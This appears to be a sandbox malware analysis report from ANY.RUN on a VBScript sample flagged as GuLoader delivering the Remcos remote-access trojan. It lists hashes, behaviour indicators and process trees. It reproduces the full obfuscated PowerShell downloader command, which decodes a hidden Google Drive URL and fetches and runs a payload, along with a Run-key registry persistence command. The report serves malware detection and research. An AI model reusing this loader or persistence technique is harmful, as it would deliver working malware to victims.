File name:

script (1).vbs

Full analysis: https://app.any.run/tasks/e16e54d5-5c66-4068-a654-d0ba8ccf4607
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Malware Trends Tracker     >>>
Analysis date: November 27, 2024, 15:09:09
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
remcos
rat
guloader
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (349), with CRLF line terminators
MD5:

EC2C9E20EA0DB858F5759086FE9F12B1

SHA1:

DC2C3FD9E8C14908FCD3DAEB425FCC7AEFC0C24C

SHA256:

3B73AF57D7C17745EC7B9BA202E8D712C8B3F58ECCCABFC77DB8DED379590EEC

SSDEEP:

768:cGfasXAuuTDKOp7p65M04NKzGqhZrvGU8hLVVnO0rP6oahTd:dfasqT+665qMGq/rgxO0KD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • REMCOS has been detected (YARA)

      • msiexec.exe (PID: 6056)

    • GULOADER has been detected (YARA)

      • msiexec.exe (PID: 6056)

    • REMCOS mutex has been found

      • msiexec.exe (PID: 6056)

    • GULOADER SHELLCODE has been detected (YARA)

      • msiexec.exe (PID: 6056)

    • Known privilege escalation attack

      • dllhost.exe (PID: 2136)

  • SUSPICIOUS

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2212)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2212)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2212)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2212)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 6260)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6260)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 3436)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 7064)

    • There is functionality for taking screenshot (YARA)

      • msiexec.exe (PID: 6056)

    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 6056)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 6260)

    • Checks proxy server information

      • powershell.exe (PID: 6260)

    • Manual execution by a user

      • powershell.exe (PID: 7064)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6260)
      • powershell.exe (PID: 7064)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6260)
      • powershell.exe (PID: 7064)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7064)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
11
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe cmd.exe no specs conhost.exe no specs reg.exe no specs CMSTPLUA msiexec.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2136C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\SysWOW64\dllhost.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll
2212"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\script (1).vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3364\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3436"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fjervgtsbokserne% -windowstyle 1 $Aktiveringers=(gp -Path 'HKCU:\Software\Wanhappy69\').Inexhaustibility;%Fjervgtsbokserne% ($Aktiveringers)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
4764REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Fjervgtsbokserne% -windowstyle 1 $Aktiveringers=(gp -Path 'HKCU:\Software\Wanhappy69\').Inexhaustibility;%Fjervgtsbokserne% ($Aktiveringers)"C:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
5576"C:\WINDOWS\System32\msiexec.exe" C:\Windows\SysWOW64\msiexec.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
6056"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
6260"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Nonelementally='Tyees';;$Rewrote='Stykstrrelsen';;$Preponderance='Swotting';;$Spadicose='Overcasts';;$Forseek='Politiarbejde';;$neurospasm=$host.Name;function Tariflns($Undisastrously){If ($neurospasm) {$eukalyptusoliernes=4} for ($Packly=$eukalyptusoliernes;;$Packly+=5){if(!$Undisastrously[$Packly]) { break }$velarernes+=$Undisastrously[$Packly]}$velarernes}function Thorvil($Demarkssamfundets){ .($Agists) ($Demarkssamfundets)}$Fourageringens=Tariflns ' inrn ForeSolft iag.Gug WUna E AlgBmenicPerolIncoiGrotEBogsNS,otT';$Tungekantens=Tariflns 'Bib MFarvo odozForhiGranlShorlSnowaOmro/';$Gevaldigeres=Tariflns 'TyktTO,tal k msComi1Sner2';$Saltmandlen=' B s[UncoN paaEAfgitLiba.NonaSFloseHemarH,geVD,seIUnmyCChile oulPCurlOUdsgiMac nSkaftTaiwMSalgaDeviNvelsA eadGBentESurhrflle] Sub:Auto:B.vusH ckE koCmiljU EstrPodaI erit S.nySar.PRefeR FraoSemitFornO M cCInteoFruglFono=,amp$Hov.G E seeftevKaloaSpralDiseD R eiMuncGPriseNeg.RKoniEcrums';$Tungekantens+=Tariflns ' M.g5Trun.Varm0Lori Pone( proW Ma.iDes n BerdStinoUroew MedsN nf PerfN ogiT Sha Reou1Gede0 Fak.vask0Ald,; Vi Tri W Po i ekon O.e6 idd4 udd; mat Savbx ran6Part4Exil;Alex KlaprPlagv.all:Vit 1ruth3port1Chab.proc0Walt) Mul AfstGbogkeSyllcMdelkDeoxoOrga/Iono2genm0Spol1Educ0 nhi0 Skr1Agur0Donk1Plan quarFS kti Nonr,hukeBlomf Varomejsx.onc/Lady1Agat3Pebe1 .am.Disi0';$Retractors=Tariflns 'DemauSmreSSu.ce,andRSku - ykkAAftrgSemiEVippnGlyct';$Brigandine=Tariflns 'LagnhKirst LaktCapep SyssSp,y:Afle/ Ud /SynkdFictrhumaiFodbvRegue .nd.AffagGnatoblg oTabbgK.rulExereBo e.Unplc ehnoAnormO er/InvauGirocbare?Ho.neRhinxViripTerroUnderRbd tKlem=KolldMedfoBnhrw Udan Refl UnloIntha NeadRedd&F,nki JobdProg= S,l1 DatcFang2MadepChalnweasUAfbicSw.evfiarM AccA Alc1 VelSMargHFor,U on9Mura0DiveMS,deNStatATu eUCorph,lynE PrefMedi6NongSflamHPos iKollLUdslDP ovTStalHOcta- Co.s';$Administrere=Tariflns 'Pill>';$Agists=Tariflns 'Br.diUdfaeGyp x';$Saftningen0='Multispecies';$Viceborgmestrene='\Statsbesgene106.Phy';Thorvil (Tariflns ' ans$IndsG br,lLi loClinBTvana S llMind:StomLNonagAlleE JorPMisflVandAIndvN ristOp oEBaglRalte1 Enc3S.dt2,sso=Ded $W,goePardnO,erVOocy: Al.a eekP TrgP aldUkldAHjemt Dema,nco+extr$ F.eV StoI C.ec S lEIndfbDsleoCwo r E tgTilsMudmuE marsdebatPladR EnhE BecnEi.tE');Thorvil (Tariflns 'Trn,$nlbjGRec.l TriOPo ubUlemaOve l App: PerMSpiril kes Go,DBeauaMissnbedsnSagleFor.LPa,lS Vide NonRSol,Slu.r=Trus$WaagBOv rRObstI ResgBjeraFlopnDi,kdPre,iTeksNSak E .ry.I itS elfP HalL UdbI Udgt Fre(Fisk$Aucta NotdModtm,iftiCarcnLasti ForSBeattStedr Un EOrgarTo reNeig)');Thorvil (Tariflns $Saltmandlen);$Brigandine=$Misdannelsers[0];$Forsultnes=(Tariflns 'Sl.o$incog PrelUnaroCryaB olfA F.rLF rh:opklSHjerOOv,raTh rP BruERastrDuk ySkuf=DejeN HosEPippWPulm-Lig oMinbbU skjInveEPen,COkseTOn m SproSBje Y vddSWastTaf oeGenuMUnsa.Out.$ Stef ,aroArisUSmugR onASongG .haeL,geRyou IAcetNAfs.G AuteRestnVestS');Thorvil ($Forsultnes);Thorvil (Tariflns 'Mark$S ltS AntoUnsaaformp .tieEmberBetrybrug. RegHretieRhaba PredCogie .olrPre sVigt[Rea $O.lfRNonlePurgtBewarM.tiaSkalcRheutPossoSemerKroes ko]Gede=Sols$Pho T eliusysln .opgTrepe GrakTaruaImmunPalotFleleT.nnnNubis');$Togetheriness107=Tariflns 'depl$StabS OveoJensaTi,upCleaeTranr PyoyFrem.fa.eDSprnoOverwKul,nSloglRokkoAt raOpr dErhvFArthiNo dlM sfeUncr(Lang$ LedBGidsrTobiiUnu gOrthaBordnRetsd StriPrednForge nai,Prec$RadiSJ.zzcLavla Su lKernesemib,ronaTerirPlotkT,le)';$Scalebark=$Lgeplanter132;Thorvil (Tariflns ' one$Besgg L.tLFrugoRuskbTr.vaChunLFag :missC Al eHorenRkn.TBrydrSekraFr gl FedBProtIMi,sbLsekL S oiOceao mfotP.ogeFiloKF rgemi.fTU.mysW ll=Imar( natS ileStdeSBes T.onf-Ind PBlitA,efaTFantHWadd Hy $StemSVapocCompaRynklGebreOrn BPrioASociR Felk Lab)');while (!$centralbibliotekets) {Thorvil (Tariflns ' Flg$Ta rgReall Bilo,aanbUnstaEterlBode:leucT evieL vemB rkpPlasrCribebagvl .teyKast=V rk$HuskA lehmBandpRe cuSyntlGenns') ;Thorvil $Togetheriness107;Thorvil (Tariflns 'SlanS oadtMi iASkanR IontNomi- ReisDevilFlytePas e Te,PTins U oe4');Thorvil (Tariflns ' ink$ ,hegSimplRefrO Absb ,yta ExcLDrve: SelC rcieDezinNon TM.tor ArkAAfsplA ndBDefrISa tBmet L koliRygeo oqt StoeOospKBurge,dvaT B as U d=Nitr(.esmt upeeVognShusmT Civ-Ar.hPBohea Va,TD reh Dec .oca$S ilS CruCMiljA K jl MoteOmp B onAUnderAfdeKTra )') ;Thorvil (Tariflns ',rdr$Provg CybLButtOaf,ebRingaEff LOver:,naibvo olFordO .anMBagas Falt Ly ESlvtrSt ff SanOHun rPropR Raae Knit K.mNUnadi plNMicrgPseuEFunkNSanc=flle$ AfrGTestlDoneOManiBPlowaMa tlusol:B muAGaliabillRAn.aGPrioASkr.NRoeng O.dsAnmov M riCognN MysEBau 1,ool6 Civ9Elod+Kamm+Bisi% Syn$EndomS itI lumsSam.d DrvAMelin S rNBla eWhitLPrluSAn eE strrKiniSLoka.ElecCSelvO M.ruPeppNGallt') ;$Brigandine=$Misdannelsers[$Blomsterforretningen]}$Anbruddet=293276;$Bitterens78=29815;Thorvil (Tariflns ' Tid$HillGDejtL eccoKr.ebSpekA rolLFilo: GlaS SenTH,beU LinrIff,DUrtei,eliEKuffrFjelSPaafTUnmauC okrMensDFilmIManiEs ldsButt Kin=file T aGT,noeDeagTR.ex-A.isCDireOTebrn,arnTCaliEVejlNTenoTSuns Uns$E,izsma,bcmediATaleLAnveEGraabMingaj ngrCoquk');Thorvil (Tariflns 'lat $G,adgBrndlAntio deebAutoaPonylReb :CumqSGalip HanrEnsieN naeRonguhemewStje Trus=Su e Vag[ LagSglo,yS,rbsTaxitTidee.quim Dag.P,vlC To.oOvernPacovf omeHjtrrWeentRing] Hup:.aga:ChabFNoner uncoUnn mTankB Hera lefsNonee S.u6fims4,isaSPor.tSu.mrForbiUnvinKodegroen( oni$Ge,eSFst t ConuUfo rTromdFugliRo keAandrGlads.vint sotuSlanr EvedInveiRea ef essHgrn)');Thorvil (Tariflns 'Snoo$,eomG S nl,aanODagvb HydAKe.rlGud :Til,FAnkeOToldrEnectSummy oncSBoscKOplsEPyr.nSupedLrene Inf9 The4G nt acr =Ha t T ll[ BurSSt,vYBronSSideTSomaE PreMMetr.SeisT Ao,e ysXPaakTArk .craceUncrnViolcSponoUdstdQue iKissnKar,g Had]Came:An.a: StoAlockS Re cbrddiStv IMe,i.MoragEpi.e E sT Swes LusTJappR undiLn.unTjenGBund( ,ot$ConfsChriP ,isrf.rkeDipnECuteU Lgpwex e)');Thorvil (Tariflns ' Phe$UnhyGIldsLThorO Grobbeg.AOverLSulf:FyrsANoecd M aSSelvPBet RButteUnred SlaEBamalF rcs ,rkE VkkRFjen2Lead3snac5 .aa=Stav$UmbrF.kspoA,leR luetAutoyBal.sNavik SanERutsNOr hDSt,gEIsln9Fint4Spha.piprs.topUMultbAmbaSTvistFotorNstvI S jn S,oGWebs(sols$ ninABelyNSterbForbr B oURa.kdnutwDD nseHybrtHo a, Fre$ArabBSammiDouctLodsTMicrePlasrBisteSpaanUafhs t o7Re u8 Kvi)');Thorvil $Adspredelser235;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6272\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7064"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Nonelementally='Tyees';;$Rewrote='Stykstrrelsen';;$Preponderance='Swotting';;$Spadicose='Overcasts';;$Forseek='Politiarbejde';;$neurospasm=$host.Name;function Tariflns($Undisastrously){If ($neurospasm) {$eukalyptusoliernes=4} for ($Packly=$eukalyptusoliernes;;$Packly+=5){if(!$Undisastrously[$Packly]) { break }$velarernes+=$Undisastrously[$Packly]}$velarernes}function Thorvil($Demarkssamfundets){ .($Agists) ($Demarkssamfundets)}$Fourageringens=Tariflns ' inrn ForeSolft iag.Gug WUna E AlgBmenicPerolIncoiGrotEBogsNS,otT';$Tungekantens=Tariflns 'Bib MFarvo odozForhiGranlShorlSnowaOmro/';$Gevaldigeres=Tariflns 'TyktTO,tal k msComi1Sner2';$Saltmandlen=' B s[UncoN paaEAfgitLiba.NonaSFloseHemarH,geVD,seIUnmyCChile oulPCurlOUdsgiMac nSkaftTaiwMSalgaDeviNvelsA eadGBentESurhrflle] Sub:Auto:B.vusH ckE koCmiljU EstrPodaI erit S.nySar.PRefeR FraoSemitFornO M cCInteoFruglFono=,amp$Hov.G E seeftevKaloaSpralDiseD R eiMuncGPriseNeg.RKoniEcrums';$Tungekantens+=Tariflns ' M.g5Trun.Varm0Lori Pone( proW Ma.iDes n BerdStinoUroew MedsN nf PerfN ogiT Sha Reou1Gede0 Fak.vask0Ald,; Vi Tri W Po i ekon O.e6 idd4 udd; mat Savbx ran6Part4Exil;Alex KlaprPlagv.all:Vit 1ruth3port1Chab.proc0Walt) Mul AfstGbogkeSyllcMdelkDeoxoOrga/Iono2genm0Spol1Educ0 nhi0 Skr1Agur0Donk1Plan quarFS kti Nonr,hukeBlomf Varomejsx.onc/Lady1Agat3Pebe1 .am.Disi0';$Retractors=Tariflns 'DemauSmreSSu.ce,andRSku - ykkAAftrgSemiEVippnGlyct';$Brigandine=Tariflns 'LagnhKirst LaktCapep SyssSp,y:Afle/ Ud /SynkdFictrhumaiFodbvRegue .nd.AffagGnatoblg oTabbgK.rulExereBo e.Unplc ehnoAnormO er/InvauGirocbare?Ho.neRhinxViripTerroUnderRbd tKlem=KolldMedfoBnhrw Udan Refl UnloIntha NeadRedd&F,nki JobdProg= S,l1 DatcFang2MadepChalnweasUAfbicSw.evfiarM AccA Alc1 VelSMargHFor,U on9Mura0DiveMS,deNStatATu eUCorph,lynE PrefMedi6NongSflamHPos iKollLUdslDP ovTStalHOcta- Co.s';$Administrere=Tariflns 'Pill>';$Agists=Tariflns 'Br.diUdfaeGyp x';$Saftningen0='Multispecies';$Viceborgmestrene='\Statsbesgene106.Phy';Thorvil (Tariflns ' ans$IndsG br,lLi loClinBTvana S llMind:StomLNonagAlleE JorPMisflVandAIndvN ristOp oEBaglRalte1 Enc3S.dt2,sso=Ded $W,goePardnO,erVOocy: Al.a eekP TrgP aldUkldAHjemt Dema,nco+extr$ F.eV StoI C.ec S lEIndfbDsleoCwo r E tgTilsMudmuE marsdebatPladR EnhE BecnEi.tE');Thorvil (Tariflns 'Trn,$nlbjGRec.l TriOPo ubUlemaOve l App: PerMSpiril kes Go,DBeauaMissnbedsnSagleFor.LPa,lS Vide NonRSol,Slu.r=Trus$WaagBOv rRObstI ResgBjeraFlopnDi,kdPre,iTeksNSak E .ry.I itS elfP HalL UdbI Udgt Fre(Fisk$Aucta NotdModtm,iftiCarcnLasti ForSBeattStedr Un EOrgarTo reNeig)');Thorvil (Tariflns $Saltmandlen);$Brigandine=$Misdannelsers[0];$Forsultnes=(Tariflns 'Sl.o$incog PrelUnaroCryaB olfA F.rLF rh:opklSHjerOOv,raTh rP BruERastrDuk ySkuf=DejeN HosEPippWPulm-Lig oMinbbU skjInveEPen,COkseTOn m SproSBje Y vddSWastTaf oeGenuMUnsa.Out.$ Stef ,aroArisUSmugR onASongG .haeL,geRyou IAcetNAfs.G AuteRestnVestS');Thorvil ($Forsultnes);Thorvil (Tariflns 'Mark$S ltS AntoUnsaaformp .tieEmberBetrybrug. RegHretieRhaba PredCogie .olrPre sVigt[Rea $O.lfRNonlePurgtBewarM.tiaSkalcRheutPossoSemerKroes ko]Gede=Sols$Pho T eliusysln .opgTrepe GrakTaruaImmunPalotFleleT.nnnNubis');$Togetheriness107=Tariflns 'depl$StabS OveoJensaTi,upCleaeTranr PyoyFrem.fa.eDSprnoOverwKul,nSloglRokkoAt raOpr dErhvFArthiNo dlM sfeUncr(Lang$ LedBGidsrTobiiUnu gOrthaBordnRetsd StriPrednForge nai,Prec$RadiSJ.zzcLavla Su lKernesemib,ronaTerirPlotkT,le)';$Scalebark=$Lgeplanter132;Thorvil (Tariflns ' one$Besgg L.tLFrugoRuskbTr.vaChunLFag :missC Al eHorenRkn.TBrydrSekraFr gl FedBProtIMi,sbLsekL S oiOceao mfotP.ogeFiloKF rgemi.fTU.mysW ll=Imar( natS ileStdeSBes T.onf-Ind PBlitA,efaTFantHWadd Hy $StemSVapocCompaRynklGebreOrn BPrioASociR Felk Lab)');while (!$centralbibliotekets) {Thorvil (Tariflns ' Flg$Ta rgReall Bilo,aanbUnstaEterlBode:leucT evieL vemB rkpPlasrCribebagvl .teyKast=V rk$HuskA lehmBandpRe cuSyntlGenns') ;Thorvil $Togetheriness107;Thorvil (Tariflns 'SlanS oadtMi iASkanR IontNomi- ReisDevilFlytePas e Te,PTins U oe4');Thorvil (Tariflns ' ink$ ,hegSimplRefrO Absb ,yta ExcLDrve: SelC rcieDezinNon TM.tor ArkAAfsplA ndBDefrISa tBmet L koliRygeo oqt StoeOospKBurge,dvaT B as U d=Nitr(.esmt upeeVognShusmT Civ-Ar.hPBohea Va,TD reh Dec .oca$S ilS CruCMiljA K jl MoteOmp B onAUnderAfdeKTra )') ;Thorvil (Tariflns ',rdr$Provg CybLButtOaf,ebRingaEff LOver:,naibvo olFordO .anMBagas Falt Ly ESlvtrSt ff SanOHun rPropR Raae Knit K.mNUnadi plNMicrgPseuEFunkNSanc=flle$ AfrGTestlDoneOManiBPlowaMa tlusol:B muAGaliabillRAn.aGPrioASkr.NRoeng O.dsAnmov M riCognN MysEBau 1,ool6 Civ9Elod+Kamm+Bisi% Syn$EndomS itI lumsSam.d DrvAMelin S rNBla eWhitLPrluSAn eE strrKiniSLoka.ElecCSelvO M.ruPeppNGallt') ;$Brigandine=$Misdannelsers[$Blomsterforretningen]}$Anbruddet=293276;$Bitterens78=29815;Thorvil (Tariflns ' Tid$HillGDejtL eccoKr.ebSpekA rolLFilo: GlaS SenTH,beU LinrIff,DUrtei,eliEKuffrFjelSPaafTUnmauC okrMensDFilmIManiEs ldsButt Kin=file T aGT,noeDeagTR.ex-A.isCDireOTebrn,arnTCaliEVejlNTenoTSuns Uns$E,izsma,bcmediATaleLAnveEGraabMingaj ngrCoquk');Thorvil (Tariflns 'lat $G,adgBrndlAntio deebAutoaPonylReb :CumqSGalip HanrEnsieN naeRonguhemewStje Trus=Su e Vag[ LagSglo,yS,rbsTaxitTidee.quim Dag.P,vlC To.oOvernPacovf omeHjtrrWeentRing] Hup:.aga:ChabFNoner uncoUnn mTankB Hera lefsNonee S.u6fims4,isaSPor.tSu.mrForbiUnvinKodegroen( oni$Ge,eSFst t ConuUfo rTromdFugliRo keAandrGlads.vint sotuSlanr EvedInveiRea ef essHgrn)');Thorvil (Tariflns 'Snoo$,eomG S nl,aanODagvb HydAKe.rlGud :Til,FAnkeOToldrEnectSummy oncSBoscKOplsEPyr.nSupedLrene Inf9 The4G nt acr =Ha t T ll[ BurSSt,vYBronSSideTSomaE PreMMetr.SeisT Ao,e ysXPaakTArk .craceUncrnViolcSponoUdstdQue iKissnKar,g Had]Came:An.a: StoAlockS Re cbrddiStv IMe,i.MoragEpi.e E sT Swes LusTJappR undiLn.unTjenGBund( ,ot$ConfsChriP ,isrf.rkeDipnECuteU Lgpwex e)');Thorvil (Tariflns ' Phe$UnhyGIldsLThorO Grobbeg.AOverLSulf:FyrsANoecd M aSSelvPBet RButteUnred SlaEBamalF rcs ,rkE VkkRFjen2Lead3snac5 .aa=Stav$UmbrF.kspoA,leR luetAutoyBal.sNavik SanERutsNOr hDSt,gEIsln9Fint4Spha.piprs.topUMultbAmbaSTvistFotorNstvI S jn S,oGWebs(sols$ ninABelyNSterbForbr B oURa.kdnutwDD nseHybrtHo a, Fre$ArabBSammiDouctLodsTMicrePlasrBisteSpaanUafhs t o7Re u8 Kvi)');Thorvil $Adspredelser235;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
Total events
15 053
Read events
15 050
Write events
3
Delete events
0

Modification events

(PID) Process:(6056) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Wanhappy69
Operation:writeName:Inexhaustibility
Value:
;$Nonelementally='Tyees';;$Rewrote='Stykstrrelsen';;$Preponderance='Swotting';;$Spadicose='Overcasts';;$Forseek='Politiarbejde';;$neurospasm=$host.Name;function Tariflns($Undisastrously){If ($neurospasm) {$eukalyptusoliernes=4} for ($Packly=$eukalyptusoliernes;;$Packly+=5){if(!$Undisastrously[$Packly]) { break }$velarernes+=$Undisastrously[$Packly]}$velarernes}function Thorvil($Demarkssamfundets){ .($Agists) ($Demarkssamfundets)}$Fourageringens=Tariflns ' inrn ForeSolft iag.Gug WUna E AlgBmenicPerolIncoiGrotEBogsNS,otT';$Tungekantens=Tariflns 'Bib MFarvo odozForhiGranlShorlSnowaOmro/';$Gevaldigeres=Tariflns 'TyktTO,tal k msComi1Sner2';$Saltmandlen=' B s[UncoN paaEAfgitLiba.NonaSFloseHemarH,geVD,seIUnmyCChile oulPCurlOUdsgiMac nSkaftTaiwMSalgaDeviNvelsA eadGBentESurhrflle] Sub:Auto:B.vusH ckE koCmiljU EstrPodaI erit S.nySar.PRefeR FraoSemitFornO M cCInteoFruglFono=,amp$Hov.G E seeftevKaloaSpralDiseD R eiMuncGPriseNeg.RKoniEcrums';$Tungekantens+=Tariflns ' M.g5Trun.Varm0Lori Pone( proW Ma.iDes n BerdStinoUroew MedsN nf PerfN ogiT Sha Reou1Gede0 Fak.vask0Ald,; Vi Tri W Po i ekon O.e6 idd4 udd; mat Savbx ran6Part4Exil;Alex KlaprPlagv.all:Vit 1ruth3port1Chab.proc0Walt) Mul AfstGbogkeSyllcMdelkDeoxoOrga/Iono2genm0Spol1Educ0 nhi0 Skr1Agur0Donk1Plan quarFS kti Nonr,hukeBlomf Varomejsx.onc/Lady1Agat3Pebe1 .am.Disi0';$Retractors=Tariflns 'DemauSmreSSu.ce,andRSku - ykkAAftrgSemiEVippnGlyct';$Brigandine=Tariflns 'LagnhKirst LaktCapep SyssSp,y:Afle/ Ud /SynkdFictrhumaiFodbvRegue .nd.AffagGnatoblg oTabbgK.rulExereBo e.Unplc ehnoAnormO er/InvauGirocbare?Ho.neRhinxViripTerroUnderRbd tKlem=KolldMedfoBnhrw Udan Refl UnloIntha NeadRedd&F,nki JobdProg= S,l1 DatcFang2MadepChalnweasUAfbicSw.evfiarM AccA 